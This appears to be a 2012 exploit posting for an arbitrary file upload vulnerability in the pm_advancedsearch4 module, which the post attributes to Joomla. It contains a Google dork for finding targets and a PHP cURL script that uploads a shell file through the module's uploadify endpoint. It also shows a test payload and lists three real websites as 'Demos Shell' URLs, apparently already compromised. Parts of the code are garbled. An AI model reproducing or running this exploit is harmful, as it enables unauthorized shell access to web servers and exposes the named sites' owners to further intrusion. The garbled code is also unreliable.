facebook facebook twitter rss

Joomla modules - pm_advancedsearch4 Arbitrary File Upload Vulnerability

Author: Zikou-16 , Published: 15-12-2012
-------------------------------------------------------------------------------
Joomla modules - pm_advancedsearch4 Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------


#####
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"pm_advancedsearch4"
#
# Tested on : Windows 7 , Backtrack 5r3
####

Exploit : uploadshell.php

<?php
$uploadfile
="dz.php";
$ch curl_init("http://localhost/modules/pm_advancedsearch4/js/uploadify/uploadify.php?folder=/modules/pm_advancedsearch4/js/uploadify/");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
?>

Shell Access : http://localhost/modules/pm_advancedsearch4/js/uploadify/50bcd9e474d4c.php
<?php
phpinfo
();
?>

------------------------------

[#] Demos Shell :

http://aflyc.bermark.fr/modules/pm_advancedsearch4/js/uploadify/50ccd9ecc4d4c.php
http://stlwax.com/modules/pm_advancedsearch4/js/uploadify/50c5f43d10813.php/
http://www.indicedemode.fr/modules/pm_advancedsearch4/js/uploadify/50a12986c91e1.php

------------------------------ The End

Like us on Facebook :